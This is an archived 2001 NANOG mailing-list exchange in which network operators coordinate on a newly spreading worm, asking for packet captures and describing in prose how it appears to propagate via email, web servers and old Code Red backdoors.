Worm probes.. Looking for captures.
Michael Airhart
mairhart at cisco.com
Tue Sep 18 16:49:34 UTC 2001
Folks,
If anyone has a packet capture of the infection in progress, would you
please contact me. I would like to get it to the some of the Cisco IOS
folks ASAP. (Not my official job, but would like to help.)
Thanks!!
Michael Airhart
At 11:54 AM 9/18/2001 -0400, Eric Gauthier wrote:
> > Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
> > I've nailed a copy, and am working on getting it to the right security
> > people. A *PRELIMINARY* (eyeballing the output of 'strings' indicates that
> > this one *both* sends itself via-email a la SirCam, *AND* scans for
> vulnerable
> > web servers, and if it finds a vulnerable server, it causes anybody
> visiting
> > that webpage to be offered a contaminated .exe as well.
> > I do *NOT* have a handle on what malicious effects it has other than just
> > propagating.
>
>I work at a large university and our security guys think this guy is what's
>been causing us problems all morning. Lots of subnet scans (tons of
>incomplete arps), CC Mail servers are wacking out, HPOV noting that
>old 3Com gear is dropping etc. This is what I've heard through the rumor
>mill (so take it with a grain of salt)...
>
>"...At first blush, it spreads itself via by web, email, and maybe shares.
>We've seen it spreading by a set of two HTTP requests. It will look for
>backdoors left behind by Code Red, such as /scripts/root.exe. It uses tftp
>to copy itself to the target machine then launches it via a second HTTP
>command."
>
>Eric :)
--------------------------------------------------------------------------------------------------------
Michael Airhart 512/378-1246 Office
Consulting Systems Engineer 413/480-1958 eFax
Cisco Systems, Inc. 800/365-4578 Pager
12515 Research Blvd mairhart at cisco.com
Austin, TX 78759
More information about the NANOG
mailing list